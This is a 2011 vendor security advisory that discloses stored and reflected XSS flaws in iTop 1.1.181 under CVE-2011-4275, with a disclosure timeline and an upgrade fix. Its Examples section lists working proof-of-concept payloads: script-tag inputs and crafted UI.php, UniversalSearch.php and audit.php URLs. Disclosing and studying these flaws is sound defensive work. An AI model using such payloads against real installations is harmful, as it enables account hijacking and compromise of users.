TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181

Type securityvulns
Reporter Securityvulns
Modified 2011-11-27T00:00:00


TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181

Published: 2011/11/16 Version 1.0

Affected products: iTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well)

References: CVE-2011-4275 - Multiple web-vulnerabilities in iTop TC-SA-2011-02 (used for updates)

Summary: "IT Operations Portal: a complete open source, ITIL, web based service management tool including a fully customizable CMDB, a helpdesk system and a document management tool." Several common flaws could be found in iTop like reflected and stored XSS.

Vulnerable Scripts: stored XSS: - almost every tested input field stored in database and in the html-content of the site. Especially in case data is reformatted using Javascript, the sanitisation in place seems to be overridden.

reflected XSS:
 - almost every test input field where the value is reflected in

servers output

Examples: stored XSS: - add a company named "XSS <script>alert("Help Me")</script>" - add a database server named "XSS <script>alert("Help Me")</script>" - import a CSV-File where one cell contains "XSS <script>alert("Help Me")</script>" - copy&paste data (which does the same as CSV-import) using 1;Test 1 2;Test 2 3;Test 3<script>alert("23746234243 Test")</script>"

reflected XSS &#40;un-authenticated&#41;:

http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help Me")</script><lala="&suggest_pwd=admin

reflected XSS &#40;authenticated&#41;:

http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help Me")</script><lala="&suggest_pwd=admin

http://$domain/iTop/pages/UniversalSearch.php?c[menu]="<script>alert("Help Me")</script>"

http://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note&currentId=Searc hFormToAdd_document_list \ &description="<script>alert("Help Me")</script>"&dosearch=1&name=Acunetix&open=1&operation=search \ _form&org_id=3&status=draft&type=contract

http://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C /script%3E%22&operation=errors&rule=1

http://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%2894 9560%29%20bad%3d%22&suggest_pwd=test

http://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouse over%3dprompt%28972137%29%20bad%3d%22

Possible solutions: - use version 1.2 final

Disclosure Timeline: 2011/08/09 vendor contacted via 2011/08/09 inital vendor response 2011/09/06 first patch by the vendor 2011/09/12 second patch by the vendor 2011/11/16 public disclosure

Credits: Tobias Glemser ( Tele-Consulting security networking training GmbH, Germany

Disclaimer: All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore Tele-Consulting shall not be liable for any direct or indirect damages that might be caused by using this information.